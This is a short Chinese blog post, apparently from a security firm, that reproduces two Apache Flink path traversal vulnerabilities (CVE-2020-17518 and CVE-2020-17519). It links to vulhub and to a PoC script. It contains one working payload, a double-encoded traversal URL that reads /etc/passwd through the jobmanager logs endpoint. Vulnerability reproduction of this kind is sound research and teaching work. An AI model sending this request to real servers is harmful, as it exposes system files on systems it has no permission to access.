本月,Apache Flink项目公开了该框架中的两个严重的路径遍历漏洞,攻击者可以通过该漏洞在易受攻击的系统上上传和查看任意文件。
Apache Flink是一个用Java和Scala编写的开源统一流处理和批处理框架。在披露后的几个小时内,黑客已发布了漏洞的PoC,可用于攻击存在漏洞的Apache Flink实例。
漏洞复现
部署flink-1.11.2[1]
CVE-2020-17518:通过路径遍历上传任意文件
POC:
CVE-2020-17519:通过路径遍历读取任意文件
POC:
http://10.0.0.2:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd |
参考链接
-
https://archive.apache.org/dist/flink/flink-1.11.2/
-
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
-
https://github.com/B1anda0/CVE-2020-17519/blob/main/CVE-2020-17519.py
为多省公安厅提供技术支撑工作,为上合峰会、财富论坛、金砖五国等多次重大活动提供网络安保支撑工作。在多次攻防赛事中连获佳绩,网安中国行第一名,连续两届红帽杯冠军、网鼎杯线上第一名,在补天杯、极棒杯、全国多地的护网演习等也都获得优秀的成绩,每年获得大量的CNVD、CNNVD、CICSVD、CVE证书、编号和致谢。如需帮助请咨询 [email protected]
本文始发于微信公众号(山石网科安全技术研究院):Apache Flink漏洞(CVE-2020-17518&CVE-2020-17519)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论